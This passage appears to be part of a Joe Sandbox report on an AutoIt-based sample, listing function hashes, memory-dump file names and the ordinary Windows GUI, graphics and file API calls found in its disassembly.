                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                                    • String ID:
                                                                                                    • API String ID: 3192549508-0
                                                                                                    • Opcode ID: 7f47eed4f86214b17010b2722a270a8484b0cf114c6054f91d77442311777efd
                                                                                                    • Instruction ID: 2467ba74e956f7be3c5dcd0eecef91dac22e5fe32f01aebf6ebefd277a7adab4
                                                                                                    • Opcode Fuzzy Hash: 7f47eed4f86214b17010b2722a270a8484b0cf114c6054f91d77442311777efd
                                                                                                    • Instruction Fuzzy Hash:
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 0
                                                                                                    • API String ID: 0-4108050209
                                                                                                    • Opcode ID: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                                                                                    • Instruction ID: 8972f152be45c61aa52b66aec86a96c8f5cc4be620c2144e38b20412ab91f621
                                                                                                    • Opcode Fuzzy Hash: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                                                                                    • Instruction Fuzzy Hash: 4851AD7160C7059BDF788778895DFBE27E99B12340F1B050DEA82DB282CA25DE81DF52
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 42233e93606714ed3d318d226849d52b8a472c666fec1bfa63c9b8c13a8a5917
                                                                                                    • Instruction ID: 33803a092f87fb275f982d9b2c6be3054c9d6cc0bc272f0dde0b179dc00133d3
                                                                                                    • Opcode Fuzzy Hash: 42233e93606714ed3d318d226849d52b8a472c666fec1bfa63c9b8c13a8a5917
                                                                                                    • Instruction Fuzzy Hash: EA324326D69F014DD7279634DC22339A249AFB73C5F15C737F81AB6AA6EF28C5835100
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 2754ffaa6b69e99852e27258e570bdd1e47c43b67c5df65915052cec8014b42c
                                                                                                    • Instruction ID: a075e16cd9c5d5f8c0887f96197236b13674c342f6063d979a9a0ac2312e6767
                                                                                                    • Opcode Fuzzy Hash: 2754ffaa6b69e99852e27258e570bdd1e47c43b67c5df65915052cec8014b42c
                                                                                                    • Instruction Fuzzy Hash: E4323C31A0411D8BDF28CFAAC690ABD7BB1EB45370F288566F649CB292D734DD81DB40
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 6eee29e916960897e1125cb968efea6c145cbe87727725b304e52ad10e8073f9
                                                                                                    • Instruction ID: f71003375893c1b7caee409d654076982377c69079cfbdaad3b4f76a588edea6
                                                                                                    • Opcode Fuzzy Hash: 6eee29e916960897e1125cb968efea6c145cbe87727725b304e52ad10e8073f9
                                                                                                    • Instruction Fuzzy Hash: E022A0B0E0060ADFDF14CF65D981AAEB3F6FF45304F244529E816AB291EB369D11CB60
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: a9ef79489b297b0a2146affbca9314a0881eae7aa519434f59c7cd376e28ba5d
                                                                                                    • Instruction ID: a4e40991ca22b1698ba36d7b5840ccd8dbbce601f56755db6cbe037bebaa7c66
                                                                                                    • Opcode Fuzzy Hash: a9ef79489b297b0a2146affbca9314a0881eae7aa519434f59c7cd376e28ba5d
                                                                                                    • Instruction Fuzzy Hash: BD02C5B0A00205EFDF04DF65D981AAEB7B5FF44340F218169E8169B2D1EB35EE24CB95
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                                    • Instruction ID: a6ee8a578cef33e0e171f062d61b2d360b6259f9153023e57764519a2527bd21
                                                                                                    • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                                    • Instruction Fuzzy Hash: AE9156723080A349DB2A473E8574A7DFFE15A533A131B079DE4F3CA1C6FE248965D620
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                                    • Instruction ID: acc6abfc207bba404495ad88bd05dbcc101a928b0300994719212c7bb04a61d9
                                                                                                    • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                                    • Instruction Fuzzy Hash: 4D9123723090A34ADB2D477A8574A3DFFF15A933A131B079DD4F2CA1C2FE24C9659A20
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: e2c76b0c41f9858548ff1379a24deb75b9e541dd062f70bac1e49622876fcd3e
                                                                                                    • Instruction ID: 38fd5fdfc0727e576347a373eb51c71f935bb2b9e7c85250f440d9e2b2a1b24f
                                                                                                    • Opcode Fuzzy Hash: e2c76b0c41f9858548ff1379a24deb75b9e541dd062f70bac1e49622876fcd3e
                                                                                                    • Instruction Fuzzy Hash: 6061487160C709A7DB349B288E95FBE23A4EF41750F17091EE843DF281DA159E42CF55
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 412da774ac2da30e1e18f56cd13e2eac06d4f4277e315c30b244d648a58f8744
                                                                                                    • Instruction ID: 326aee709f6f0a7f1dfd990c7bc05ca912b552c4d91c0266b77f34a212d8cd88
                                                                                                    • Opcode Fuzzy Hash: 412da774ac2da30e1e18f56cd13e2eac06d4f4277e315c30b244d648a58f8744
                                                                                                    • Instruction Fuzzy Hash: 71617A72608709A7DE3A9B284952FBF23A4EF42744F12095EF843DF281DA16AD42CE55
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                                    • Instruction ID: 2aea3f8aaddc38ab449ebd68789bac682f960b4ed6272318b38b3f98604d19bf
                                                                                                    • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                                    • Instruction Fuzzy Hash: 7E81417270D0A349EB69473A8574A3EFFE15A933A131B079DD4F2CA1C2EE24D554E620
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: b30bb6936f383ce47abf5590e222f28cf6cf1f94798d2492385fc48ee83b62b3
                                                                                                    • Instruction ID: 58dda31bb26b502c68ece42344c185203fe9ac2880312ee1c2ab50902b7521c4
                                                                                                    • Opcode Fuzzy Hash: b30bb6936f383ce47abf5590e222f28cf6cf1f94798d2492385fc48ee83b62b3
                                                                                                    • Instruction Fuzzy Hash: 4A51289194FBD69FE7039774887A188FF30EC5B51436886CFC8805A88BD791502ADB9A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 766161dc7ba3aa9d6a16737f125325f29b0774b06bd3213b3f953fee747d769b
                                                                                                    • Instruction ID: 5eecfad6af02ad2e64e8458c01559a4f10156034847f619558fa206cf40d75e1
                                                                                                    • Opcode Fuzzy Hash: 766161dc7ba3aa9d6a16737f125325f29b0774b06bd3213b3f953fee747d769b
                                                                                                    • Instruction Fuzzy Hash: D321D5326206118BD728CF79C8226BA73E5E754310F15866EE4A7C73D1DE39A944CB80
                                                                                                    APIs
                                                                                                    • DeleteObject.GDI32(00000000), ref: 00B22B30
                                                                                                    • DeleteObject.GDI32(00000000), ref: 00B22B43
                                                                                                    • DestroyWindow.USER32 ref: 00B22B52
                                                                                                    • GetDesktopWindow.USER32 ref: 00B22B6D
                                                                                                    • GetWindowRect.USER32(00000000), ref: 00B22B74
                                                                                                    • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00B22CA3
                                                                                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00B22CB1
                                                                                                    • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B22CF8
                                                                                                    • GetClientRect.USER32(00000000,?), ref: 00B22D04
                                                                                                    • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00B22D40
                                                                                                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B22D62
                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B22D75
                                                                                                    • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B22D80
                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00B22D89
                                                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B22D98
                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00B22DA1
                                                                                                    • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B22DA8
                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00B22DB3
                                                                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B22DC5
                                                                                                    • OleLoadPicture.OLEAUT32(?,00000000,00000000,00B3FC38,00000000), ref: 00B22DDB
                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00B22DEB
                                                                                                    • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00B22E11
                                                                                                    • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00B22E30
                                                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B22E52
                                                                                                    • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B2303F
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                                    • String ID: $AutoIt v3$DISPLAY$static
                                                                                                    • API String ID: 2211948467-2373415609
                                                                                                    • Opcode ID: 7d9d11aa1b4b6dac6341fa3162d52ce41b77b4e758b53b31924574a6d04eb653
                                                                                                    • Instruction ID: 0ae80172484f0ad3ed209ef34e0fb624a59c13c2f068804a543efac464793644
                                                                                                    • Opcode Fuzzy Hash: 7d9d11aa1b4b6dac6341fa3162d52ce41b77b4e758b53b31924574a6d04eb653
                                                                                                    • Instruction Fuzzy Hash: 9D028B71900215EFDB14DFA8DD89EAE7BB9EF49310F148558F919AB2A1CB34ED00CB60
                                                                                                    APIs
                                                                                                    • SetTextColor.GDI32(?,00000000), ref: 00B3712F
                                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 00B37160
                                                                                                    • GetSysColor.USER32(0000000F), ref: 00B3716C
                                                                                                    • SetBkColor.GDI32(?,000000FF), ref: 00B37186
                                                                                                    • SelectObject.GDI32(?,?), ref: 00B37195
                                                                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 00B371C0
                                                                                                    • GetSysColor.USER32(00000010), ref: 00B371C8
                                                                                                    • CreateSolidBrush.GDI32(00000000), ref: 00B371CF
                                                                                                    • FrameRect.USER32(?,?,00000000), ref: 00B371DE
                                                                                                    • DeleteObject.GDI32(00000000), ref: 00B371E5
                                                                                                    • InflateRect.USER32(?,000000FE,000000FE), ref: 00B37230
                                                                                                    • FillRect.USER32(?,?,?), ref: 00B37262
                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00B37284
                                                                                                      • Part of subcall function 00B373E8: GetSysColor.USER32(00000012), ref: 00B37421
                                                                                                      • Part of subcall function 00B373E8: SetTextColor.GDI32(?,?), ref: 00B37425
                                                                                                      • Part of subcall function 00B373E8: GetSysColorBrush.USER32(0000000F), ref: 00B3743B
                                                                                                      • Part of subcall function 00B373E8: GetSysColor.USER32(0000000F), ref: 00B37446
                                                                                                      • Part of subcall function 00B373E8: GetSysColor.USER32(00000011), ref: 00B37463
                                                                                                      • Part of subcall function 00B373E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00B37471
                                                                                                      • Part of subcall function 00B373E8: SelectObject.GDI32(?,00000000), ref: 00B37482
                                                                                                      • Part of subcall function 00B373E8: SetBkColor.GDI32(?,00000000), ref: 00B3748B
                                                                                                      • Part of subcall function 00B373E8: SelectObject.GDI32(?,?), ref: 00B37498
                                                                                                      • Part of subcall function 00B373E8: InflateRect.USER32(?,000000FF,000000FF), ref: 00B374B7
                                                                                                      • Part of subcall function 00B373E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00B374CE
                                                                                                      • Part of subcall function 00B373E8: GetWindowLongW.USER32(00000000,000000F0), ref: 00B374DB
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                                                                    • String ID:
                                                                                                    • API String ID: 4124339563-0
                                                                                                    • Opcode ID: 8f2fa39e93df87ee06faa1dcb4208e696a3fc8e4efcf298769cd48fc3f7adfb8
                                                                                                    • Instruction ID: 923482a1147b561f03bb75052d2fc595c9dcf2202cdb4f22c2aecb084f486acc
                                                                                                    • Opcode Fuzzy Hash: 8f2fa39e93df87ee06faa1dcb4208e696a3fc8e4efcf298769cd48fc3f7adfb8
                                                                                                    • Instruction Fuzzy Hash: F1A19F72008701AFDB109FA4DC49E6FBBE9FB49321F200A19F962A71E1DB71E944DB51
                                                                                                    APIs
                                                                                                    • DestroyWindow.USER32(?,?), ref: 00AB8E14
                                                                                                    • SendMessageW.USER32(?,00001308,?,00000000), ref: 00AF6AC5
                                                                                                    • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00AF6AFE
                                                                                                    • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00AF6F43
                                                                                                      • Part of subcall function 00AB8F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00AB8BE8,?,00000000,?,?,?,?,00AB8BBA,00000000,?), ref: 00AB8FC5
                                                                                                    • SendMessageW.USER32(?,00001053), ref: 00AF6F7F
                                                                                                    • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00AF6F96
                                                                                                    • ImageList_Destroy.COMCTL32(00000000,?), ref: 00AF6FAC
                                                                                                    • ImageList_Destroy.COMCTL32(00000000,?), ref: 00AF6FB7
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
                                                                                                    • String ID: 0
                                                                                                    • API String ID: 2760611726-4108050209
                                                                                                    • Opcode ID: e7a4176402a4094714cf3aa47c97cdd910ced729ca2fc6d6805b40b92182b678
                                                                                                    • Instruction ID: 3db7a3611a2818cc1b0039826f74919013555ab0231e98a53c9140aab5e879e9
                                                                                                    • Opcode Fuzzy Hash: e7a4176402a4094714cf3aa47c97cdd910ced729ca2fc6d6805b40b92182b678
                                                                                                    • Instruction Fuzzy Hash: 40129E31200205EFD725DF68C944BB9BBF9FB44300F148469F6999B262CB35EC92DB91
                                                                                                    APIs
